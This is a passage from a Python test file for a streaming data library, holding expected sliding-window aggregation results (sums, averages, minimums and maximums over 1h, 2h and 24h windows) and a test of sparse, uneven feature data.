'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 0.0, 'number_of_stuff2_avg_24h': 0.0, 'number_of_stuff2_avg_2h': 0.0,
'number_of_stuff2_max_1h': 0, 'number_of_stuff2_max_24h': 0, 'number_of_stuff2_max_2h': 0,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
{'col1': 1, 'number_of_stuff1_avg_1h': 0.5, 'number_of_stuff1_avg_24h': 0.5, 'number_of_stuff1_avg_2h': 0.5,
'number_of_stuff1_max_1h': 1, 'number_of_stuff1_max_24h': 1, 'number_of_stuff1_max_2h': 1,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 1, 'number_of_stuff1_sum_24h': 1, 'number_of_stuff1_sum_2h': 1,
'number_of_stuff2_avg_1h': 0.0, 'number_of_stuff2_avg_24h': 0.0, 'number_of_stuff2_avg_2h': 0.0,
'number_of_stuff2_max_1h': 0, 'number_of_stuff2_max_24h': 0, 'number_of_stuff2_max_2h': 0,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
{'col2': 1, 'number_of_stuff1_avg_1h': 0.5, 'number_of_stuff1_avg_24h': 0.5, 'number_of_stuff1_avg_2h': 0.5,
'number_of_stuff1_max_1h': 1, 'number_of_stuff1_max_24h': 1, 'number_of_stuff1_max_2h': 1,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 1, 'number_of_stuff1_sum_24h': 1, 'number_of_stuff1_sum_2h': 1,
'number_of_stuff2_avg_1h': 0.5, 'number_of_stuff2_avg_24h': 0.5, 'number_of_stuff2_avg_2h': 0.5,
'number_of_stuff2_max_1h': 1, 'number_of_stuff2_max_24h': 1, 'number_of_stuff2_max_2h': 1,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 1, 'number_of_stuff2_sum_24h': 1, 'number_of_stuff2_sum_2h': 1},
{'col1': 2, 'number_of_stuff1_avg_1h': 1.0, 'number_of_stuff1_avg_24h': 1.0, 'number_of_stuff1_avg_2h': 1.0,
'number_of_stuff1_max_1h': 2, 'number_of_stuff1_max_24h': 2, 'number_of_stuff1_max_2h': 2,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 3, 'number_of_stuff1_sum_24h': 3, 'number_of_stuff1_sum_2h': 3,
'number_of_stuff2_avg_1h': 0.5, 'number_of_stuff2_avg_24h': 0.5, 'number_of_stuff2_avg_2h': 0.5,
'number_of_stuff2_max_1h': 1, 'number_of_stuff2_max_24h': 1, 'number_of_stuff2_max_2h': 1,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 1, 'number_of_stuff2_sum_24h': 1, 'number_of_stuff2_sum_2h': 1},
{'col2': 2, 'number_of_stuff1_avg_1h': 1.0, 'number_of_stuff1_avg_24h': 1.0, 'number_of_stuff1_avg_2h': 1.0,
'number_of_stuff1_max_1h': 2, 'number_of_stuff1_max_24h': 2, 'number_of_stuff1_max_2h': 2,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 3, 'number_of_stuff1_sum_24h': 3, 'number_of_stuff1_sum_2h': 3,
'number_of_stuff2_avg_1h': 1.0, 'number_of_stuff2_avg_24h': 1.0, 'number_of_stuff2_avg_2h': 1.0,
'number_of_stuff2_max_1h': 2, 'number_of_stuff2_max_24h': 2, 'number_of_stuff2_max_2h': 2,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 3, 'number_of_stuff2_sum_24h': 3, 'number_of_stuff2_sum_2h': 3},
{'col1': 3, 'number_of_stuff1_avg_1h': 2.0, 'number_of_stuff1_avg_24h': 1.5, 'number_of_stuff1_avg_2h': 1.5,
'number_of_stuff1_max_1h': 3, 'number_of_stuff1_max_24h': 3, 'number_of_stuff1_max_2h': 3,
'number_of_stuff1_min_1h': 1, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 6, 'number_of_stuff1_sum_24h': 6, 'number_of_stuff1_sum_2h': 6,
'number_of_stuff2_avg_1h': 1.0, 'number_of_stuff2_avg_24h': 1.0, 'number_of_stuff2_avg_2h': 1.0,
'number_of_stuff2_max_1h': 2, 'number_of_stuff2_max_24h': 2, 'number_of_stuff2_max_2h': 2,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 3, 'number_of_stuff2_sum_24h': 3, 'number_of_stuff2_sum_2h': 3},
{'col2': 3, 'number_of_stuff1_avg_1h': 2.0, 'number_of_stuff1_avg_24h': 1.5, 'number_of_stuff1_avg_2h': 1.5,
'number_of_stuff1_max_1h': 3, 'number_of_stuff1_max_24h': 3, 'number_of_stuff1_max_2h': 3,
'number_of_stuff1_min_1h': 1, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 6, 'number_of_stuff1_sum_24h': 6, 'number_of_stuff1_sum_2h': 6,
'number_of_stuff2_avg_1h': 2.0, 'number_of_stuff2_avg_24h': 1.5, 'number_of_stuff2_avg_2h': 1.5,
'number_of_stuff2_max_1h': 3, 'number_of_stuff2_max_24h': 3, 'number_of_stuff2_max_2h': 3,
'number_of_stuff2_min_1h': 1, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 6, 'number_of_stuff2_sum_24h': 6, 'number_of_stuff2_sum_2h': 6},
{'col1': 4, 'number_of_stuff1_avg_1h': 3.0, 'number_of_stuff1_avg_24h': 2.0, 'number_of_stuff1_avg_2h': 2.0,
'number_of_stuff1_max_1h': 4, 'number_of_stuff1_max_24h': 4, 'number_of_stuff1_max_2h': 4,
'number_of_stuff1_min_1h': 2, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 9, 'number_of_stuff1_sum_24h': 10, 'number_of_stuff1_sum_2h': 10,
'number_of_stuff2_avg_1h': 2.0, 'number_of_stuff2_avg_24h': 1.5, 'number_of_stuff2_avg_2h': 1.5,
'number_of_stuff2_max_1h': 3, 'number_of_stuff2_max_24h': 3, 'number_of_stuff2_max_2h': 3,
'number_of_stuff2_min_1h': 1, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 6, 'number_of_stuff2_sum_24h': 6, 'number_of_stuff2_sum_2h': 6},
{'col2': 4, 'number_of_stuff1_avg_1h': 3.0, 'number_of_stuff1_avg_24h': 2.0, 'number_of_stuff1_avg_2h': 2.0,
'number_of_stuff1_max_1h': 4, 'number_of_stuff1_max_24h': 4, 'number_of_stuff1_max_2h': 4,
'number_of_stuff1_min_1h': 2, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 9, 'number_of_stuff1_sum_24h': 10, 'number_of_stuff1_sum_2h': 10,
'number_of_stuff2_avg_1h': 3.0, 'number_of_stuff2_avg_24h': 2.0, 'number_of_stuff2_avg_2h': 2.0,
'number_of_stuff2_max_1h': 4, 'number_of_stuff2_max_24h': 4, 'number_of_stuff2_max_2h': 4,
'number_of_stuff2_min_1h': 2, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 9, 'number_of_stuff2_sum_24h': 10, 'number_of_stuff2_sum_2h': 10},
{'col1': 5, 'number_of_stuff1_avg_1h': 4.0, 'number_of_stuff1_avg_24h': 2.5, 'number_of_stuff1_avg_2h': 3.0,
'number_of_stuff1_max_1h': 5, 'number_of_stuff1_max_24h': 5, 'number_of_stuff1_max_2h': 5,
'number_of_stuff1_min_1h': 3, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 1,
'number_of_stuff1_sum_1h': 12, 'number_of_stuff1_sum_24h': 15, 'number_of_stuff1_sum_2h': 15,
'number_of_stuff2_avg_1h': 3.0, 'number_of_stuff2_avg_24h': 2.0, 'number_of_stuff2_avg_2h': 2.0,
'number_of_stuff2_max_1h': 4, 'number_of_stuff2_max_24h': 4, 'number_of_stuff2_max_2h': 4,
'number_of_stuff2_min_1h': 2, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 9, 'number_of_stuff2_sum_24h': 10, 'number_of_stuff2_sum_2h': 10},
{'col2': 5, 'number_of_stuff1_avg_1h': 4.0, 'number_of_stuff1_avg_24h': 2.5, 'number_of_stuff1_avg_2h': 3.0,
'number_of_stuff1_max_1h': 5, 'number_of_stuff1_max_24h': 5, 'number_of_stuff1_max_2h': 5,
'number_of_stuff1_min_1h': 3, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 1,
'number_of_stuff1_sum_1h': 12, 'number_of_stuff1_sum_24h': 15, 'number_of_stuff1_sum_2h': 15,
'number_of_stuff2_avg_1h': 4.0, 'number_of_stuff2_avg_24h': 2.5, 'number_of_stuff2_avg_2h': 3.0,
'number_of_stuff2_max_1h': 5, 'number_of_stuff2_max_24h': 5, 'number_of_stuff2_max_2h': 5,
'number_of_stuff2_min_1h': 3, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 1,
'number_of_stuff2_sum_1h': 12, 'number_of_stuff2_sum_24h': 15, 'number_of_stuff2_sum_2h': 15},
{'col1': 6, 'number_of_stuff1_avg_1h': 5.0, 'number_of_stuff1_avg_24h': 3.0, 'number_of_stuff1_avg_2h': 4.0,
'number_of_stuff1_max_1h': 6, 'number_of_stuff1_max_24h': 6, 'number_of_stuff1_max_2h': 6,
'number_of_stuff1_min_1h': 4, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 2,
'number_of_stuff1_sum_1h': 15, 'number_of_stuff1_sum_24h': 21, 'number_of_stuff1_sum_2h': 20,
'number_of_stuff2_avg_1h': 4.0, 'number_of_stuff2_avg_24h': 2.5, 'number_of_stuff2_avg_2h': 3.0,
'number_of_stuff2_max_1h': 5, 'number_of_stuff2_max_24h': 5, 'number_of_stuff2_max_2h': 5,
'number_of_stuff2_min_1h': 3, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 1,
'number_of_stuff2_sum_1h': 12, 'number_of_stuff2_sum_24h': 15, 'number_of_stuff2_sum_2h': 15},
{'col2': 6, 'number_of_stuff1_avg_1h': 5.0, 'number_of_stuff1_avg_24h': 3.0, 'number_of_stuff1_avg_2h': 4.0,
'number_of_stuff1_max_1h': 6, 'number_of_stuff1_max_24h': 6, 'number_of_stuff1_max_2h': 6,
'number_of_stuff1_min_1h': 4, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 2,
'number_of_stuff1_sum_1h': 15, 'number_of_stuff1_sum_24h': 21, 'number_of_stuff1_sum_2h': 20,
'number_of_stuff2_avg_1h': 5.0, 'number_of_stuff2_avg_24h': 3.0, 'number_of_stuff2_avg_2h': 4.0,
'number_of_stuff2_max_1h': 6, 'number_of_stuff2_max_24h': 6, 'number_of_stuff2_max_2h': 6,
'number_of_stuff2_min_1h': 4, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 2,
'number_of_stuff2_sum_1h': 15, 'number_of_stuff2_sum_24h': 21, 'number_of_stuff2_sum_2h': 20},
{'col1': 7, 'number_of_stuff1_avg_1h': 6.0, 'number_of_stuff1_avg_24h': 3.5, 'number_of_stuff1_avg_2h': 5.0,
'number_of_stuff1_max_1h': 7, 'number_of_stuff1_max_24h': 7, 'number_of_stuff1_max_2h': 7,
'number_of_stuff1_min_1h': 5, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 3,
'number_of_stuff1_sum_1h': 18, 'number_of_stuff1_sum_24h': 28, 'number_of_stuff1_sum_2h': 25,
'number_of_stuff2_avg_1h': 5.0, 'number_of_stuff2_avg_24h': 3.0, 'number_of_stuff2_avg_2h': 4.0,
'number_of_stuff2_max_1h': 6, 'number_of_stuff2_max_24h': 6, 'number_of_stuff2_max_2h': 6,
'number_of_stuff2_min_1h': 4, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 2,
'number_of_stuff2_sum_1h': 15, 'number_of_stuff2_sum_24h': 21, 'number_of_stuff2_sum_2h': 20},
{'col2': 7, 'number_of_stuff1_avg_1h': 6.0, 'number_of_stuff1_avg_24h': 3.5, 'number_of_stuff1_avg_2h': 5.0,
'number_of_stuff1_max_1h': 7, 'number_of_stuff1_max_24h': 7, 'number_of_stuff1_max_2h': 7,
'number_of_stuff1_min_1h': 5, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 3,
'number_of_stuff1_sum_1h': 18, 'number_of_stuff1_sum_24h': 28, 'number_of_stuff1_sum_2h': 25,
'number_of_stuff2_avg_1h': 6.0, 'number_of_stuff2_avg_24h': 3.5, 'number_of_stuff2_avg_2h': 5.0,
'number_of_stuff2_max_1h': 7, 'number_of_stuff2_max_24h': 7, 'number_of_stuff2_max_2h': 7,
'number_of_stuff2_min_1h': 5, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 3,
'number_of_stuff2_sum_1h': 18, 'number_of_stuff2_sum_24h': 28, 'number_of_stuff2_sum_2h': 25},
{'col1': 8, 'number_of_stuff1_avg_1h': 7.0, 'number_of_stuff1_avg_24h': 4.0, 'number_of_stuff1_avg_2h': 6.0,
'number_of_stuff1_max_1h': 8, 'number_of_stuff1_max_24h': 8, 'number_of_stuff1_max_2h': 8,
'number_of_stuff1_min_1h': 6, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 4,
'number_of_stuff1_sum_1h': 21, 'number_of_stuff1_sum_24h': 36, 'number_of_stuff1_sum_2h': 30,
'number_of_stuff2_avg_1h': 6.0, 'number_of_stuff2_avg_24h': 3.5, 'number_of_stuff2_avg_2h': 5.0,
'number_of_stuff2_max_1h': 7, 'number_of_stuff2_max_24h': 7, 'number_of_stuff2_max_2h': 7,
'number_of_stuff2_min_1h': 5, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 3,
'number_of_stuff2_sum_1h': 18, 'number_of_stuff2_sum_24h': 28, 'number_of_stuff2_sum_2h': 25},
{'col2': 8, 'number_of_stuff1_avg_1h': 7.0, 'number_of_stuff1_avg_24h': 4.0, 'number_of_stuff1_avg_2h': 6.0,
'number_of_stuff1_max_1h': 8, 'number_of_stuff1_max_24h': 8, 'number_of_stuff1_max_2h': 8,
'number_of_stuff1_min_1h': 6, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 4,
'number_of_stuff1_sum_1h': 21, 'number_of_stuff1_sum_24h': 36, 'number_of_stuff1_sum_2h': 30,
'number_of_stuff2_avg_1h': 7.0, 'number_of_stuff2_avg_24h': 4.0, 'number_of_stuff2_avg_2h': 6.0,
'number_of_stuff2_max_1h': 8, 'number_of_stuff2_max_24h': 8, 'number_of_stuff2_max_2h': 8,
'number_of_stuff2_min_1h': 6, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 4,
'number_of_stuff2_sum_1h': 21, 'number_of_stuff2_sum_24h': 36, 'number_of_stuff2_sum_2h': 30},
{'col1': 9, 'number_of_stuff1_avg_1h': 8.0, 'number_of_stuff1_avg_24h': 4.5, 'number_of_stuff1_avg_2h': 7.0,
'number_of_stuff1_max_1h': 9, 'number_of_stuff1_max_24h': 9, 'number_of_stuff1_max_2h': 9,
'number_of_stuff1_min_1h': 7, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 5,
'number_of_stuff1_sum_1h': 24, 'number_of_stuff1_sum_24h': 45, 'number_of_stuff1_sum_2h': 35,
'number_of_stuff2_avg_1h': 7.0, 'number_of_stuff2_avg_24h': 4.0, 'number_of_stuff2_avg_2h': 6.0,
'number_of_stuff2_max_1h': 8, 'number_of_stuff2_max_24h': 8, 'number_of_stuff2_max_2h': 8,
'number_of_stuff2_min_1h': 6, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 4,
'number_of_stuff2_sum_1h': 21, 'number_of_stuff2_sum_24h': 36, 'number_of_stuff2_sum_2h': 30},
{'col2': 9, 'number_of_stuff1_avg_1h': 8.0, 'number_of_stuff1_avg_24h': 4.5, 'number_of_stuff1_avg_2h': 7.0,
'number_of_stuff1_max_1h': 9, 'number_of_stuff1_max_24h': 9, 'number_of_stuff1_max_2h': 9,
'number_of_stuff1_min_1h': 7, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 5,
'number_of_stuff1_sum_1h': 24, 'number_of_stuff1_sum_24h': 45, 'number_of_stuff1_sum_2h': 35,
'number_of_stuff2_avg_1h': 8.0, 'number_of_stuff2_avg_24h': 4.5, 'number_of_stuff2_avg_2h': 7.0,
'number_of_stuff2_max_1h': 9, 'number_of_stuff2_max_24h': 9, 'number_of_stuff2_max_2h': 9,
'number_of_stuff2_min_1h': 7, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 5,
'number_of_stuff2_sum_1h': 24, 'number_of_stuff2_sum_24h': 45, 'number_of_stuff2_sum_2h': 35}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_sparse_data_uneven_feature_occurrence():
controller = build_flow([
SyncEmitSource(),
AggregateByKey(
[FieldAggregator("number_of_stuff1", "col1", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator("number_of_stuff2", "col2", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
controller.emit({'col1': 0}, 'tal', test_base_time)
for i in range(10):
controller.emit({'col2': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': math.nan, 'number_of_stuff2_avg_24h': math.nan, 'number_of_stuff2_avg_2h': math.nan,
'number_of_stuff2_max_1h': math.nan, 'number_of_stuff2_max_24h': math.nan, 'number_of_stuff2_max_2h': math.nan,
'number_of_stuff2_min_1h': math.nan, 'number_of_stuff2_min_24h': math.nan, 'number_of_stuff2_min_2h': math.nan,
'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
{'col2': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 0.0, 'number_of_stuff2_avg_24h': 0.0, 'number_of_stuff2_avg_2h': 0.0,
'number_of_stuff2_max_1h': 0, 'number_of_stuff2_max_24h': 0, 'number_of_stuff2_max_2h': 0,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
{'col2': 1, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 0.5, 'number_of_stuff2_avg_24h': 0.5, 'number_of_stuff2_avg_2h': 0.5,
'number_of_stuff2_max_1h': 1, 'number_of_stuff2_max_24h': 1, 'number_of_stuff2_max_2h': 1,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 1, 'number_of_stuff2_sum_24h': 1, 'number_of_stuff2_sum_2h': 1},
{'col2': 2, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 1.0, 'number_of_stuff2_avg_24h': 1.0, 'number_of_stuff2_avg_2h': 1.0,
'number_of_stuff2_max_1h': 2, 'number_of_stuff2_max_24h': 2, 'number_of_stuff2_max_2h': 2,
'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 3, 'number_of_stuff2_sum_24h': 3, 'number_of_stuff2_sum_2h': 3},
{'col2': 3, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 2.0, 'number_of_stuff2_avg_24h': 1.5, 'number_of_stuff2_avg_2h': 1.5,
'number_of_stuff2_max_1h': 3, 'number_of_stuff2_max_24h': 3, 'number_of_stuff2_max_2h': 3,
'number_of_stuff2_min_1h': 1, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 6, 'number_of_stuff2_sum_24h': 6, 'number_of_stuff2_sum_2h': 6},
{'col2': 4, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 3.0, 'number_of_stuff2_avg_24h': 2.0, 'number_of_stuff2_avg_2h': 2.0,
'number_of_stuff2_max_1h': 4, 'number_of_stuff2_max_24h': 4, 'number_of_stuff2_max_2h': 4,
'number_of_stuff2_min_1h': 2, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
'number_of_stuff2_sum_1h': 9, 'number_of_stuff2_sum_24h': 10, 'number_of_stuff2_sum_2h': 10},
{'col2': 5, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 4.0, 'number_of_stuff2_avg_24h': 2.5, 'number_of_stuff2_avg_2h': 3.0,
'number_of_stuff2_max_1h': 5, 'number_of_stuff2_max_24h': 5, 'number_of_stuff2_max_2h': 5,
'number_of_stuff2_min_1h': 3, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 1,
'number_of_stuff2_sum_1h': 12, 'number_of_stuff2_sum_24h': 15, 'number_of_stuff2_sum_2h': 15},
{'col2': 6, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 5.0, 'number_of_stuff2_avg_24h': 3.0, 'number_of_stuff2_avg_2h': 4.0,
'number_of_stuff2_max_1h': 6, 'number_of_stuff2_max_24h': 6, 'number_of_stuff2_max_2h': 6,
'number_of_stuff2_min_1h': 4, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 2,
'number_of_stuff2_sum_1h': 15, 'number_of_stuff2_sum_24h': 21, 'number_of_stuff2_sum_2h': 20},
{'col2': 7, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 6.0, 'number_of_stuff2_avg_24h': 3.5, 'number_of_stuff2_avg_2h': 5.0,
'number_of_stuff2_max_1h': 7, 'number_of_stuff2_max_24h': 7, 'number_of_stuff2_max_2h': 7,
'number_of_stuff2_min_1h': 5, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 3,
'number_of_stuff2_sum_1h': 18, 'number_of_stuff2_sum_24h': 28, 'number_of_stuff2_sum_2h': 25},
{'col2': 8, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 7.0, 'number_of_stuff2_avg_24h': 4.0, 'number_of_stuff2_avg_2h': 6.0,
'number_of_stuff2_max_1h': 8, 'number_of_stuff2_max_24h': 8, 'number_of_stuff2_max_2h': 8,
'number_of_stuff2_min_1h': 6, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 4,
'number_of_stuff2_sum_1h': 21, 'number_of_stuff2_sum_24h': 36, 'number_of_stuff2_sum_2h': 30},
{'col2': 9, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': 8.0, 'number_of_stuff2_avg_24h': 4.5, 'number_of_stuff2_avg_2h': 7.0,
'number_of_stuff2_max_1h': 9, 'number_of_stuff2_max_24h': 9, 'number_of_stuff2_max_2h': 9,
'number_of_stuff2_min_1h': 7, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 5,
'number_of_stuff2_sum_1h': 24, 'number_of_stuff2_sum_24h': 45, 'number_of_stuff2_sum_2h': 35}]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_multiple_keys_aggregation_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
